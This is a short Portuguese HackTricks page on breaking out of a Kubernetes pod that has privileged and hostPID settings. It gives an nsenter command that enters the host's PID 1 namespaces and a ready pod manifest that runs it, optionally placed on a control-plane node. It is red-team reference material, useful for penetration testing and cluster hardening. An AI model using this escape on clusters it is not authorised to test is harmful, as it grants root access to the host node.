Pod Escape Privileges

Aprenda e pratique Hacking na AWS: Treinamento HackTricks AWS Red Team Expert (ARTE) Aprenda e pratique Hacking na GCP: Treinamento HackTricks GCP Red Team Expert (GRTE)

Suporte ao HackTricks

Verifique os planos de assinatura!
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.

Privilégios e hostPID

Com esses privilégios, você terá acesso aos processos do host e privilégios suficientes para entrar no namespace de um dos processos do host. Observe que você potencialmente pode não precisar de privilégios, mas apenas de algumas capacidades e outras possíveis formas de contornar defesas (como apparmor e/ou seccomp).

Apenas executar algo como o seguinte permitirá que você escape do pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemplo de configuração:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Aprenda e pratique AWS Hacking: HackTricks Treinamento AWS Red Team Expert (ARTE) Aprenda e pratique GCP Hacking: HackTricks Treinamento GCP Red Team Expert (GRTE)

Suporte o HackTricks

Verifique os planos de assinatura!
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.

PreviousAbusing Roles/ClusterRoles in Kubernetes NextKubernetes Roles Abuse Lab

Last updated 1 month ago